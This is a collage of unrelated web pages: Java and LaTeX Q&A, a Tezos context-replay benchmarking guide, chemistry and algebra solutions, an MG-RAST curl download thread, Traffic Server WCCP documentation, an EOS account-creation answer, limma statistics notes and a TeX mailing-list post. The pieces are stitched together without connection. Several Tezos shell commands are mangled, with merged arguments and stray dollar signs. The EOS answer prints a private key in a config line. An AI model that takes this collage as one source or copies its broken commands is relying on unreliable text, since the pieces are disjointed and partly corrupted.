String[] subDirs = path.split(Pattern.quote(File.separator));
and it really works
"C:\\temt\\text.txt" -->
C:
temt
text.t
0
LVL 92
Assisted Solution
objects earned 168 total points
ID: 35013878
try this:
File f = new File(file);
String filename = f.getName();
0
LVL 47
Assisted Solution
for_yan earned 332 total points
ID: 35013879
And I tested it
String[] subDirs = path.split(Pattern.quote(File.separator));
and it really works
"C:\\temt\\text.txt" -->
C:
temt
text.txt
0
## Featured Post
Question has a verified solution.
If you are experiencing a similar issue, please ask a related question
After being asked a question last year, I went into one of my moods where I did some research and code just for the fun and learning of it all. Subsequently, from this journey, I put together this article on "Range Searching Using Visual Basic.NET …
Java functions are among the best things for programmers to work with as Java sites can be very easy to read and prepare. Java especially simplifies many processes in the coding industry as it helps integrate many forms of technology and different d…
Viewers will learn about arithmetic and Boolean expressions in Java and the logical operators used to create Boolean expressions. We will cover the symbols used for arithmetic expressions and define each logical operator and how to use them in Boole…
The viewer will learn how to implement Singleton Design Pattern in Java.
###### Suggested Courses
Course of the Month15 days, 21 hours left to enroll
#### 580 members asked questions and received personalized solutions in the past 7 days.
Join the community of 500,000 technology professionals and ask your questions. |
# Tezos reconstruction benchmark by replay
We DaiLambda are working on improving Tezos blockchain storage layer called context. The context stores versions of blockchain states including balance and smart contracts.
## Objective
We want to benchmark Tezos context reconstruction of the recent blocks, say 10000.
• Only recent blocks, not from the genesis.
• Blocks must be preloaded to exclude the network costs.
Currently we have 2 ways to replay blocks: reconstruct and replay.
## tezos-node reconstruct commits to the context, but is always from the genesis
tezos-node reconstruct reconstructs the contexts from the genesis. It takes too long time for benchmark, several days or a week. We also do not want to benchmark the context reconstruction of the old cemented blocks, since a running node does not build contexts only from floating blocks.
## tezos-node replay can replay blocks from a recent block, but does not commit contexts
tezos-node replay command is to replay specified block levels, but it NEVER commits contexts: new versions of contexts are built on memory, then their hashes are compared with the contexts already imported on disk. For the precise benchmark, we want to commit newly create contexts rather than just checking the context hashes, since the disk I/O is always the big performance factor of the node.
## Solution: replay with reconstruction
We have developed a hybrid version of these 2 methods, replay+reconstruc. Using it, we can replay recent Tezos blocks then commit their context updates to the disk. In the view point of the context storage layer, the benchmark using this replay with reconstruction is very similar to what it performs in the actual Tezos node.
Suppose that we want to replay blocks with the context reconstruction between levels $level1 and $level2.
The idea is:
• store/ carries the blocks between $level1 and $level2.
• context/ carries only the context at $level1. • Let tezos-node replay command apply the blocks between $level1 and $level2 consecutively and commit their contexts to context/ directory. ### Prepare tezos-node Your node must have tezos-node replay command. $ ./tezos-node --help
...
replay
Replay a set of previously validated blocks
...
### Prepare a full node
Prepare a full node and let $srcdir be the directory of the full node. Its storage version must be 0.0.5 or newer: $ cat $srcdir/version.json { "version": "0.0.5" } #### Upgrading storage If the storage version is 0.0.4, you have to upgrade the data directory by: $ ./tezos-node upgrade storage --data-dir $srcdir NOTE: Recent master of tezos-node has a bug around --data-dir. You MUST make sure $srcdir/config.json exists and its data-dir field points to $srcdir. ### Check the data You must first check $level1 and $level2 are available in the node: $ ./tezos-node replay --data-dir $srcdir$(($level1 + 1))$level2
### Snapshot of $level1 Make a snapshot of level $level1:
$./tezos-node snapshot export --data-dir$srcdir --block $level1 tezos-mainnet-snapshot-full.$level1
NOTE: The snapshot MUST be taken by the new store. Currently, snapshots of v9.1 called “legacy snapshots” are NOT properly imported by the latest tezos-node.
### Prepare the starting context
Now import the snapshot to a new directory $importdir: $ mkdir $importdir$ ./tezos-node snapshot import --data-dir $importdir tezos-mainnet-snapshot-full.$level1
### Prepare the replay directory
Make another directory $replaydir for the replay: Copy the store and JSON files of $srcdir:
$cp -a$srcdir/store $replaydir/$ cp $srcdir/*.json$replaydir/
Copy the context of $importdir: $ cp -a $importdir/context$replaydir/
Reinitialize the directory:
$./tezos-node config reset --data-dir$replaydir
Now $replaydir/ is ready for reconstruction from $level1:
• store/ : blocks enough to reconstruct between $level1 and $level2.
• context/: the context of $level1, the starting point of the reconstruction. ### Reconstruction by replay Now the following should work: $ ./tezos-node replay --data-dir $replaydir$((level + 1)) $((level + 2)) ... tezos-node replay cannot take the range of block levels. You need to specify levels one by one. When you rerun the reconstruction, you have to reset context/ directory: $ rm -rf $replaydir/context$ cp -a $importdir/context$replaydir
$./tezos-node replay --data-dir$replaydir lev1 lev2 ...
## Testing modified node using histroic data
If a modification to a node implementation changes context hash, pure replay+reconstruct fails because the block application may produce different context hashes from the ones expected.
To make replay+reconstruct working even in this situlation, tezos-node replay has a new option --ignore-context-hash-mismatch in https://gitlab.com/dailambda/tezos/-/tree/jun@replay-reconstruct . With this option, the context hash mismatches are ignored: if a block $B_i$ with an expected context hash $H_i$ produces a context of a different context hash $H’_i$, the mismatch does not stop the validation if the option is enabled. The replay continues and commits the result context with $H’_i$ remembering the pair of $(H_i, H’_i)$ in memory. At the replay of the next block $B_{i+1}$, the node requires the context of its predecessor $B_i$. Its context hash is $H_i$ in $B_i$, which is NOT found in the context DB. Instead we checkout the context of $H’_i$ paired with $H_i$.
Thanks to this --ignore-context-hash-mismatch option we can quickly test and bench node modifications over historic block data, even if it might produce different context hashes.
## Future work
• It takes very long time to export and import a snapshot for \$level1. What we need here is just one context and we need no store exported. It would be nice if we have a tool to copy just one version of context.
• Benchmarking fails if a shell or a protocol has modifications affect context hashes. Now we have --ignore-context-hash-mismatch option.
• Better UI. |
# Add an exit sign / running person?
What is the simplest way to add a running person, similar to the one to the right in this image in my body text?
I cannot find any appropriate unicode glyph or LaTeX symbol. Do I need to include a picture or draw something with tikz?
• You can either create a `TikZ` sign or use available, like this. – m0nhawk Aug 6 '13 at 10:44
A previous answer suggests using Inkscape. You can also print it as a pdf and then import it as a picture by using the `graphicx` package and the command `\includegraphics{<image>}`. Remember that LaTeX also allows for the direct input of SVG files. You can read the following question How to include SVG diagrams in LaTeX?
`bla blup \tikz ...; bla blup` |
# n-factor of $KMn{{O}_{4}}$in neutral medium is:A. 6B. 5C. 4D. 3
Verified
139.8k+ views
Hint: n- factor is also known as valence factor and for neutral medium it can be defined as the change in oxidation state of an atom in a compound per molecule. $KMn{{O}_{4}}$is neither an acid nor a base, it is actually neutral. It is a purplish black solid which when dissolved in water gives intensely pink or purple solutions.
Step by step solution:
- $KMn{{O}_{4}}$is a salt because it is produced from KOH which is a strong base and $MnO_{4}^{-}$ion are produced from $HMn{{O}_{4}}$, which is an acid.
- The reaction in neutral medium is:
$MnO_{4}^{-}+4{{H}^{+}}+3{{e}^{-}}\to Mn{{O}_{2}}+2{{H}_{2}}O$
- We can calculate the oxidation state of $MnO_{4}^{-}$. Here, the charge present on oxygen is -2 and the overall charge is -1.So,
\begin{align} & x+\left( 4\times -2 \right)=-1 \\ & x+\left( -8 \right)=-1 \\ & x-8=-1 \\ & x=+7 \\ \end{align}
-Now we will calculate the oxidation state of $Mn{{O}_{2}}$. Here, the charge present on oxygen is -2 and the overall charge is 0. So,
\begin{align} & x+\left( 2\times -2 \right)=0 \\ & x+\left( -4 \right)=0 \\ & x=+4 \\ \end{align}
- We can see from the reaction that, In neutral medium, $MnO_{4}^{-}$ is reduced to $Mn{{O}_{2}}$.Here the oxidation state of Mn changes from+7 to +4. For which 3 electrons are taken, hence we can say that the n factor here is 3.
- Therefore we can conclude that the option(d)that is 3 is correct. |
f(z) =
You can also select one function of the following list:
On the left Graphics view, a enhanced phase portrait of a complex function is displayed. On the right Graphics view, one can see the approximation of the function through it's Taylor polynomials $\sum_{k=0}^{n} a_k (z-z_0)^k$ at the blue base point $z_0$.
The complex function, the base point $z_0$, the order $n$ of the polynomial and the Zoom can be modified.
Pssst! Rotate your device to landscape.
Or resize your window so it's more wide than tall.
Not supported for phones.
Note: The applet was originally written by Aaron Montag using Cindy.js. The source code can be found at GitHub. |
# How do you solve 4x^2 + 2x - 1 = 0 by completing the square?
$x = \frac{\sqrt{5} - 1}{4}$ or $x = - \frac{\sqrt{5} + 1}{4}$
Dividing by $4$ we get
${x}^{2} + \frac{1}{2} x - \frac{1}{4} = 0$
${\left(x + \frac{1}{4}\right)}^{2} = \frac{5}{16}$ |
2
2
Entering edit mode
8.6 years ago
bioinfo ▴ 830
parsing • 14k views
4
Entering edit mode
8.6 years ago
5heikki 10k
I did something like this a while back:
cat keywordTableSortedUniqueIds.txt
mgm4440036.3
mgm4440037.3
mgm4440038.3
mgm4440039.3
mgm4440040.3
mgm4440041.3
mgm4440055.3
mgm4440056.3
..
do
curl http://api.metagenomics.anl.gov/1/download/"$line"?file=425.1 >$line.gz
done
The "file=XXX" part specifies what exactly you want to download from the given metagenome, e.g. 425.1 here specifies predicted rRNA.
0
Entering edit mode
that was very helpful. I have just gone through the MG-RAST manual but didn't get much info about the "download stages or file=xxx/stage=xxx". As you mentioned, file=425.1 for predicted rRNA, Do you know what file no. should I use for raw original submitted metagenome fasta sequences? I tried "file=100.2" but not sure if it is right..!!
0
Entering edit mode
Hey, I'm not sure you can gain access to the raw data by the api, however, I think file=100.2 contains the reads/contigs that passed quality filtering. There's probably also a file that contains the reads/contigs that didn't pass QC, so you could combine those if you really wanted them. You could always ask at the mg-rast mailing list..
0
Entering edit mode
Thanks. Now I have decided to go for reads that passed QC filtering and dereplication stages..!!
0
Entering edit mode
Hi, Thanks for these details about how to download data from the MG-RAST api. Did you add your webkey to access data that is not public yet? Or were these public metagenomes? I tried adding my webkey:
but I just get a summary of the file info (bp_count etc), and I'm unable to download the fasta file.
Thank you!
Katrine
0
Entering edit mode
0
Entering edit mode
File 050.2 - This is the unfiltered metagenome that was originally uploaded to MG-RAST
File 100.1 - preprocess.passed.fna
File 100.2 - preprocess.removed (low quality)
File 350.2 & 350.3 - These are the protein coding genes (amino acids and nucleotides)
File 440.1 - These are predicted rRNA sequences (I do not recommend using MG-RAST for sensitive rRNA annotation. It does not use the internal structure of the gene, which other programs appropriately use for classification)
File 550.1 - This file shows clustered sequences which are 90% identical, to reduce the number of sequences that need to be annotated. Many folks don’t even know that this happens within MG-RAST.
File 650.1 & 650.2 - These files are essentially the blat tabular output from comparing your sequence to the database.
0
Entering edit mode
Hello, what language is this besides curl? I have a windows computer and am using curl through the command prompt, and would like to do something similar to what you described.
1
Entering edit mode
It's Bash. I presume you could get Bash working on Windows with Cygwin or something but I haven't used Windows since XP so I can't really say. Alternatively, it probably doesn't take much effort to make a simple while read line loop with something that works on Windows by default like Python (?) or Java (?). If you plan to do lots of bioinformatics in the future, I suggest you ditch Windows for Linux or OS X.
0
Entering edit mode
Update- I downloaded Git Bash for windows, and I think I am having success using bash and curl with the command you listed. I am not very experienced with the Bash language yet, so I haven't added in any echo tests to see if the script is working the way I think it is. I do agree with you that windows is a hassle, but many times there are work-arounds. I will continue down this line for the people who use Windows and can not afford to/do not want to switch operating systems.
0
Entering edit mode
4.2 years ago
0
Entering edit mode |
# Tag Info
1
Initially the label $a$ represent the site on a lattice with sites separated by distance $l$. i.e., the discrete position for each of a collection of oscillators, $q_a$, with an oscillator at each lattice site. When we take the continuum limit, $l\to0$, the label $a$ becomes continuous, i.e. it becomes the position variable $x$. We now have an infinite ...
1
In general, bound states in lattice QCD are found by analyzing correlation functions of operators with the appropriate quantum numbers. This works both for baryons and mesons, even for pure-glue states like glueballs. See for example these introductory lecture notes: http://arxiv.org/abs/hep-lat/9807028. Chapter 17 should answer your questions in more ...
0
The first thing to realise here, is that in your Hamiltonian formulation, the lattice constant is implicitly stated as being $b=1$ (I'm calling it b, not to confuse it with the lattice operators). Next you can identify, if you're working in two dimensions, $x=am$ and $y=bn$ yielding \hat{H}_0=-J(\sum_{(x/b),(y/b)} ...
Top 50 recent answers are included |
Sward, G. L., Transfinite Sequences of Axiom Systems for Set Theory (1971) Szász, Domokos, Joint Diffusion on the Line (1979) Szász, D. ; Telcs, A., Random Walk in an Inhomogeneous Medium with Local Impurities (1981) Szász, Paul, On Generalized Quasi-Step and Almost-Step Parabolas, Respectively (1963) Szász, Paul, On a Sum Concerning the Zeros of the Jacobi Polynomials with Application to the Theory of Generalized Quasi-Step Parabolas (1964) Szász, Paul, The Extended Hermite--Fejér Interpolation Formula with Application to the Theory of Generalized Almost-Step Parabolas (1964) Szász, Paul, Application of the End-Calculus of Hilbert to the Bisectors of the Defect of a Triangle in the Hyperbolic Plane (1967) Szczerba, L. W., Metamathematical Properties of Some Affine Geometries (1964) Szczerba, L. W., Metamathematical Properties of Some Affine Geometries (1965) Szczerba, L. W., Interpretability of Elementary Theories (1976) |
# WCCP Configuration¶
WCCP is de-facto semi-standard used by routers to redirect network traffic to caches. It is available on most Cisco™ routers although it does not appear to be officially supported by Cisco. The primary benefits of WCCP are
• If already have a router that supports WCCP inline you do not have to change your network topology.
• WCCP fails open so that if the Traffic Server machine fails, it is bypassed and users continue to have Internet access.
Use of WCCP only makes sense for client side transparency [1] because if the clients are explicitly proxied by Traffic Server there’s no benefit to WCCP fail open, as the clients will continue to directly access the unresponsive Traffic Server host. It would be better to adjust the routing tables on the router for explicit proxying.
Because the router serves as the inline network element, Traffic Server must run on a separate host. This host can be located anywhere as long as Traffic Server is either on the same network segment or a GRE tunnel can be maintained between the Traffic Server host and the router.
This document presumes that the router is already properly configured to handle traffic between the clients and the origin servers. If you are not certain, verify it before attempting to configure Traffic Server with WCCP. This is also a good state to which to revert should the configuration go badly.
## Configuration overview¶
Setting WCCP is a three step process, first configuring the router, the Traffic Server host, and Traffic Server.
The router will not respond to WCCP protocol packets unless explicitly configured to do so. Via WCCP, the router can be made to perform packet interception and redirection needed by Traffic Server transparency. The WCCP protocol in effect acts as means of controlling a rough form of policy routing with positive heartbeat cutoff.
The Traffic Server host system must also be configured using iptables to accept connections on foreign addresses. This is done roughly the same way as the standard transparency use.
Finally Traffic Server itself must be configured for transparency and use of WCCP. The former is again very similar to the standard use, while WCCP configuration is specific to WCCP and uses a separate configuration file, referred to by the records.config file.
The primary concern for configuration in which of three basic topologies are to be used.
• Dedicated – Traffic Server traffic goes over an interface that is not used for client nor origin server traffic.
• Shared – Traffic Server traffic shares an interface with client or server traffic.
• Inside Shared – Traffic Server and client traffic share an interface.
• Outside Shared – Traffic Server and origin server traffic share an interface.
In general the dedicated topology is preferred. However, if the router has only two interfaces one of the shared topologies will be required [2] Click the links above for more detailed configuration information on a specific topology.
### Shared interface issues¶
A shared interface topology has additional issues compared to a dedicated topology that must be handled. Such a topology is required if the router has only two interfaces, and because of these additional issues it is normally only used in such cases, although nothing prevents it use even if the router has three or more interfaces.
The basic concept for a shared interface is to use a tunnel to simulate the dedicated interface case. This enables the packets to be distinguished at layer 3. For this reason, layer 2 redirection cannot be used because the WCCP configuration cannot distinguish between packets returning from the origin server and packets returning from Traffic Server as they are distinguished only by layer 2 addressing [3]. Fortunately the GRE tunnel used for packet forwarding and return can be used as the simulated interface for Traffic Server.
### Frequently encountered problems¶
#### MTU and fragmentation¶
In most cases the basic configuration using a tunnel in any topology can fail due to issues with fragmentation. The socket logic is unable to know that its packets will eventually be put in to a tunnel which will by its nature have a smaller MTU than the physical interface which it uses. This can lead to pathological behavior or outright failure as the packets sent are just a little too big. It is not possible to solve easily by changing the MTU on the physical interface because the tunnel interface uses that to compute its own MTU.
## References¶
[1] Server side transparency should also be used, but it is not as significant. In its absence, however, origin servers may see the source address of connections suddenly change from the Traffic Server address to client addresses, which could cause problems. Further, the primary reason for not having server side transparency is to hide client addresses which is defeated if the Traffic Server host fails.
[2] If your router has only one interface, it’s hardly a router.
[3] This is not fundamentally impossible, as the packets are distinct in layer |
# How are all accounts listed and how is the first account created?
If I want to list all accounts, how is that done? (not for a key but to see what accounts actually exist).
I know
cleos get accounts
can be used for a particular key. But I am trying to find out on my new install what accounts exist. How do I create the first account I guess is the problem? Because the
cleos create account
I don't think there's any built-in command to list all existing accounts. On mainnet, EOSNewYork maintains a daily updated snapshot of all existing accounts here, but that is done by querying the ledger periodically.
The first account on a single node testnet is the one you pass to nodeos with the flag --producer-name e.g. $nodeos --producer-name eosio --enable-stale-production has the account eosio producing blocks by default. I don't believe there's any automatic way to keep track of the accounts created afterwards--you'd have to inspect the entire ledger. In your example, you'd use $ cleos create account eosio <new-account-name> <pub-key-for-owner> <pub-key-for-active>
• I get this - cleos create account eosio trevoro1 EOS7oVsWPXFXYrxZARSf5qZ5ApSYwX882VpFdqESWap4ecxiUH7Jc EOS7oVsWPXFXYrxZARSf5qZ5ApSYwX882VpFdqESWap4ecxiUH7Jc Error 3090003: Provided keys, permissions, and delays do not satisfy declared authorizations Ensure that you have the related private keys inside your wallet and your wallet is unlocked Any idea what could be reason. The public key is correct as in the wallet. – Trevor Lee Oakley Aug 9 '18 at 8:41
• did you import the private key of eosio from config.ini in your wallet? is the key from cleos get account eosio in cleos wallet keys output? – confused00 Aug 9 '18 at 8:50
• You must be a genius. This appeared to work - cleos create account eosio trevoro1 EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV executed transaction: eb5690fb9add0ca6bf563a88ac867a638e362cbb2ad2967f045bfe47ded587b8 200 bytes 440 us # eosio <= eosio::newaccount {"creator":"eosio","name":"trevoro1","owner":{"threshold":1,"keys":[{"key":"EOS6MRyAjQq8ud7hVNYcfnVP... warning: transaction executed locally, but may not be confirmed by the network yet ] – Trevor Lee Oakley Aug 9 '18 at 9:04
This was answered already by confused00 but to augment his answer for anyone else -
# (DEPRECATED - Use signature-provider instead) Tuple of [public key, WIF private key] (may specify multiple times) (eosio::produ
cer_plugin)
# private-key =
# Key=Value pairs in the form =
# Where:
# is a string form of a vaild EOSIO public key
#
# is a string in the form :
#
# is KEY, or KEOSD
#
# KEY: is a string form of a valid EOSIO private key which maps to the provided public key
#
# KEOSD: is the URL where keosd is available and the approptiate wallet(s) are unlocked (eosio::producer_plugin)
signature-provider = EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV=KEY:5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD
3
You need the keys specified under signature-provider in config.ini then use then as he stated in his answer. |
### Overview
In a multicenter study, our ODAC algorithm allows researchers to fit a Cox regression model across multiple data sets, without the need of directly sharing subject-level information. The Cox regression model is a commonly used approach to model a time-to-event outcome and a set of explanatory variables, which is a foundational method for studying associations, causal effects, and predicting risk of a certain event. Before conducting the multicenter analysis, all datasets have to be converted to a unified format where all the variables are defined in a standard way (e.g, OMOP Common Data Model). We require one of the sites to be the coordinating site, and the rest to be the participating sites. The coordinating site is responsible for obtaining and broadcasting the initial value of model parameters, synthesizing information obtained from other sites, and obtaining the final results. The participating sites only need to calculate the aggregated data and transfer them to the coordinating site. A more detailed description is provided below.
### Cox Regression Model
Suppose we have K sites, and the coordinating site is the first site. Let $$X$$ be a vector denoting $$p$$ risk factors and let $$T$$ be the time-to-event for the outcome of interest. The Cox model assumes the hazard at time t follows
$$\lambda(t|X) = \lambda_{0}(t)exp(\beta^{T}X)$$
where $$\lambda_{0}(t)$$ is the baseline hazard function and $$\beta$$ is the vector of intercept and regression coefficients.
### Algorithm
#### Our algorithm has three steps:
1. First, the coordinating site fits a logistic regression model using its own data, and share the estimates of regression coefficients $$\bar{\beta}$$ to the participating sites.
2. Second, each participating site calculates the first, and the second order gradients of their own likelihood function, which are evaluated at the initial value $$\bar{\beta}$$. Explicit form of calculating these two terms can be found in [1]. These aggregate data are then transferred to the coordinating site.
3. Third, the coordinating site uses the aggregate information and it own individual level data to obtain an improved estimate of $$\beta$$.
Figure 2 below give an example of the information shared in each step in a setting with one explanatory variable in the model.
### Sample code
Set the “control” in R as beow to start ODAC algorithm
control <- list(project_name ='Lung cancer study',
step = 'initialize',
sites = c('site1', 'site2', 'site3'),
heterogeneity = FALSE,
model = 'ODAC',
family = ' binomial',
outcome = "status",
variables = c('age', 'sex'),
optim_maxit = 100,
demo(ODAC) |
# Choose a job you love, and you will never have to work a day in your life What does this quote mean?
###### Question:
Choose a job you love, and you will never have to work a day in your life
What does this quote mean?
What philosophy does the quote belong to? Describe the beliefs.
How might this quote affect people’s beliefs today?
### Endocrine glands secrete hormones directly into the blood. The blood carries the hormonesthroughout
Endocrine glands secrete hormones directly into the blood. The blood carries the hormones throughout the body. Each hormone acts only upon the organ that recognizes it. During this process, the endocrine glands work in conjunction with which body system? O immune O respiratory O integumentary O cir...
### PowerPoint SAM Capstone Project 1 can PLEASE someone do it for me I have some directions like steps and you just have to
PowerPoint SAM Capstone Project 1 can PLEASE someone do it for me I have some directions like steps and you just have to do it in a powerpoint slide please I would really appreciate it...
### What was one reason many africans resisted european colonization efforts? a) they were concerned about
What was one reason many africans resisted european colonization efforts? a) they were concerned about not receiving enough money to develop and education system b) they disagreed with many european ideas and cultures c) they wanted to work cooperatively with the europeans to improve their country...
### Solve the system of linear equations by substitution. Check your solution.y = x + 2y = 3x - 4
Solve the system of linear equations by substitution. Check your solution. y = x + 2 y = 3x - 4...
PLEASE HELP Plot 2 2/3 and 1 5/9 $PLEASE HELP Plot 2 2/3 and 1 5/9$...
### The increased ability to communicate and travel around the world has led to a phenomenon known as where companies expand
The increased ability to communicate and travel around the world has led to a phenomenon known as where companies expand their markets across international borders....
### Write a rule for the function represented by the table. x: 0 1 2 3 y: 1 -8 -17 -26 a.
Write a rule for the function represented by the table. x: 0 1 2 3 y: 1 -8 -17 -26 a. -y = -9x - 1 b. y = -9x + 1 c. y = -9x - 1 d. -y = 1 - 9x...
### 313 is what percent of 382
313 is what percent of 382...
### Which number line represents the solution set for the inequality -4(x + 3) 5-2-2x?
Which number line represents the solution set for the inequality -4(x + 3) 5-2-2x?...
### You and a friend are playing a game of chance every time you roll a 1,2,3,4 you are successful, and your friend will pay
You and a friend are playing a game of chance every time you roll a 1,2,3,4 you are successful, and your friend will pay one dollar. Every time you roll a 5 or 6 you must pay your friend 2 dollars. If 65% of your rolls are successful and 35% of your rolls are unsuccessful how much money do you expec...
### A runner is accelerating at 5 m/s². The runner starts at a stop. What is therunner's speed after 4 seconds? Show your
A runner is accelerating at 5 m/s². The runner starts at a stop. What is the runner's speed after 4 seconds? Show your math....
### Lines m and n are perpendicular. if the slope of m is zero, then the slope of n is zero undefined negative
Lines m and n are perpendicular. if the slope of m is zero, then the slope of n is zero undefined negative...
### If you are convicted for a federal crime in the US District Court which court could yousend your case to be appealed?
If you are convicted for a federal crime in the US District Court which court could you send your case to be appealed?...
### Given the explicit definition
Given the explicit definition...
### Read the passage and summarize in your own The Quran is guidance for the whole of mankind yet only those benefit from its knowledge
Read the passage and summarize in your own The Quran is guidance for the whole of mankind yet only those benefit from its knowledge and inspiration who truly recognize the great beauty and magnificence of the Quran. But what is our attitude if someone warns us through this Book? Are we ready t...
### 8times the difference of a number and 3 is 64
8times the difference of a number and 3 is 64...
### The study of the patterns and processes that affect human interaction environment of earth is geography. a. relative b.
The study of the patterns and processes that affect human interaction environment of earth is geography. a. relative b. human c. physical d. exact e. global...
### Lindsay is writing a persuasive paper on the use of calculators on exams. Which sentence, if added to her paper, would best support her claim that calculators
Lindsay is writing a persuasive paper on the use of calculators on exams. Which sentence, if added to her paper, would best support her claim that calculators should be allowed for use during exams? Calculators provide students with confidence when taking their exams. Calculators do not allow teache... |
Question: limma moderated t-statistics and B-statistics
14
15.0 years ago by
Gordon Smyth38k
Walter and Eliza Hall Institute of Medical Research, Melbourne, Australia
Gordon Smyth38k wrote:
This is to respond to a number of questions about the interpretation of the moderated t and B-statistics in limma. This will be a section of the Limma User's Guide in the next release.
Gordon
----------------------------------
Statistics for Differential Expression
A number of summary statistics are computed by the eBayes() function for each gene and each contrast. The M-value (M) is the log2-fold change, or sometimes the log2-expression level, for that gene. The A-value (A) is the the average expression level for that gene across all the arrays and channels. The moderated t-statistic (t) is the ratio of the M-value to its standard error. This has the same interpretation as an ordinary t-statistic except that the standard errors have been moderated across genes, effectively borrowing information from the ensemble of genes to aid with inference about each individual gene. The ordinary t-statistics are not usually required or recommended, but they can be recovered by
> tstat.ord <- fit$coef / fit$stdev.unscaled / fit$sigma after fitting a linear model. The ordinary t-statistic is on fit$df.residual degrees of freedom while the moderated t-statistic is on fit$df.residual+fit$df.prior degrees of freedom.
The p-value (p-value) is obtained from the moderated t-statistic, usually after some form of adjustment for multiple testing. The most popular form of adjustment is "fdr" which is Benjamini and Hochberg's method to control the false discovery rate. The meaning of the adjusted p-value is as follows. If you select all genes with p-value below a given value, say 0.05, as differentially expression, then the expected proportion of false discoveries in the selected group should be less than that value, in this case less than 5%.
The B-statistic (lods or B) is the log-odds that that gene is differentially expressed. Suppose for example that B=1.5. The odds of differential expression is exp(1.5)=4.48, i.e, about four and a half to one. The probability that the gene is differentially expressed is 4.48/(1+4.48)=0.82, i.e., the probability is about 82% that this gene is differentially expressed. A B-statistic of zero corresponds to a 50-50 chance that the gene is differentially expressed. The B-statistic is automatically adjusted for multiple testing by assuming that 1% of the genes, or some other percentage specified by the user, are expected to be differentially expressed. If there are no missing values in your data, then the moderated t and B statistics will rank the genes in exactly the same order. Even you do have spot weights or missing data, the p-values and B-statistics will usually provide a very similar ranking of the genes.
Please keep in mind that the moderated t-statistic p-values and the B-statistic probabilities depend on various sorts of mathematical assumptions which are never exactly true for microarray data. The B-statistics also depend on a prior guess for the proportion of differentially expressed genes. Therefore they are intended to be taken as a guide rather than as a strict measure of the probability of differential expression. Of the three statistics, the moderated-t, the associated p-value and the B-statistics, we usually base our gene selections on the p-value. All three measures are closely related, but the moderated-t and its p-value do not require a prior guess for the number of differentially expressed genes.
The above mentioned statistics are computed for every contrast for each gene. The eBayes() function computes one more useful statistic. The moderated F-statistic (F) combines the t-statistics for all the contrasts for each gene into an overall test of significance for that gene. The moderated F-statistic tests whether any of the contrasts are non-zero for that gene, i.e., whether that gene is differentially expressed on any contrast. The moderated-F has numerator degrees of freedom equal to the number of contrasts and denominator degrees of freedom the same as the moderated-t. Its p-value is stored as fit\$F.p.value. It is similar to the ordinary F-statistic from analysis of variance except that the denominator mean squares are moderated across genes.
In a complex experiment with many contrasts, it may be desirable to select genes firstly on the basis of their moderated F-statistics, and subsequently to decide which of the individual contrasts are significant for those genes. This cuts down on the number of tests which need to be conducted and therefore on the amount of adjustment for multiple testing. The functions classifyTestsF() and decideTests() are provided for this purpose.
microarray limma • 16k views |
# How do you expand or condense a logarithm?
Category: Logarithms »
Relevant MM Lessons:
## Overview: Expanding and Collapsing Logarithms
This question has its own dedicated lesson ». Make sure to check it out if you need a more thorough read, or want to become an expert on how expanding and condensing log expressions each shows up on tests.Here are the short notes on each log process - check out the full lesson for extra background and understanding.
## Expanding Logarithms
When we're asked to expand a logarithm, we will be given a single log expression and are expected to write it as the sum and/or difference of several simpler logarithms. What that comes down to for us is that every factor in the numerator of the log argument will be its own positive logarithm, and every factor in the denominator of the log argument will be its own negative logarithm. If any factor has an exponent, that exponent will be placed in front of the corresponding log as a multiplier.For example:$$\log \left( \frac{x^2 y}{w^3 z^5} \right)$$$$=2 \log (x) + \log(y) - 3\log (w) - 5 \log(z)$$Make sure every log has only a single, simple object in it when you're done. If you want to see more difficult problems or better understand why this end result always happens, read the dedicated lesson » on expanding logs.
## Condensing Logarithms
When we're asked to condense a logarithmic expression, we are essentially doing the opposite of what we just saw for expanding. The problems we'll see will have the sum or difference of several logs, with and without coefficients in front. Our job is to first bring any coefficients inside the logarithms, and then to compile the pieces into a single logarithm with a single argument. Similar to the concepts involved with expanding logs, positive logs will turn into numerator items, while negative logs will end up in the denominator. It is possible to become masterful at this and crush problems flawlessly with one step, but I recommend two for clarity.For example:$$4\log(a+b) - \log(x) - 3\log(c) + 2\log(w) - \log (y-z) + 2\log (4)$$I recommend quickly writing things with no coefficients. Then you'll have each piece ready to place.$$\log\big[ (a+b)^4 \big] - \log(x) - \log\big(c^3 \big) +\log\big(w^2\big) - \log (y-z) + \log (16)$$$$\longrightarrow \log \left( \frac{16(a+b)^4 w^2}{c^3 x(y-z)} \right)$$Note that for condensing logs, all the log expressions must be the same log base - otherwise you cannot combine them! There are ways teachers can try and trick you with this stuff - again refer to the dedicated lesson » for more tips and a more thorough explanation.
• Popular Content
• Get Taught
• Other Stuff |
# [texhax] Clash between \emph and \xspace
Uwe Lueck uwe.lueck at web.de
Wed Nov 15 14:44:43 CET 2006
At 19:40 04.11.06, Michael Barr wrote:
> If you compile the following file:
>
> \documentclass{article}
> \usepackage{xspace}
> \newcommand{\lin}{Lindel\"of\xspace}
> \begin{document}
> (property we call \emph{amply \lin})
>
> (property we call {\it amply \lin})
>
> (property we call {\it amply \lin\/})
> \end{document}
>
> you will see Goldilocks spacing after Lindel\"of''. Since the second is
> one is much too close, you can see that it is not the case that \xspace
> has added a space. I assume that the problem is that both macros use
> \futurelet. Any suggestions?
What clash? (Try additional tests attached below.)
What you see is, maybe, a clash between \it and \xspace,
and as Martin points out, this is no surprise.
You see that \emph and \xspace interact entirely properly
(to my own surprise!). You are right, \xspace doesn't insert
interword glue between Lindel\"of and the closing bracket
-- if it did so, it would be a bug! It is the basic idea of xspace
to check whether inserting a \space is appropriate.
But note that I am using v1.12 (2006/05/08) of xspace.sty.
Earlier versions of xspace were very simple; now it is very,
very complex; I haven't yet understood it.
Best,
Uwe.
\documentclass{article}
\usepackage{xspace}
\newcommand{\lin}{Lindel\"of\xspace}
\begin{document}
\emph{\lin}and others
{\it \lin}and others
{\it \lin \/}and others
(property we call \emph{\lin})
(property we call {\it\lin})
(property we call {\it\lin\/})
\end{document} |
A goods train and a passenger train are running on the parallel tracks in the same direction. The driver of the goods tr
### Question Asked by a Student from EXXAMM.com Team
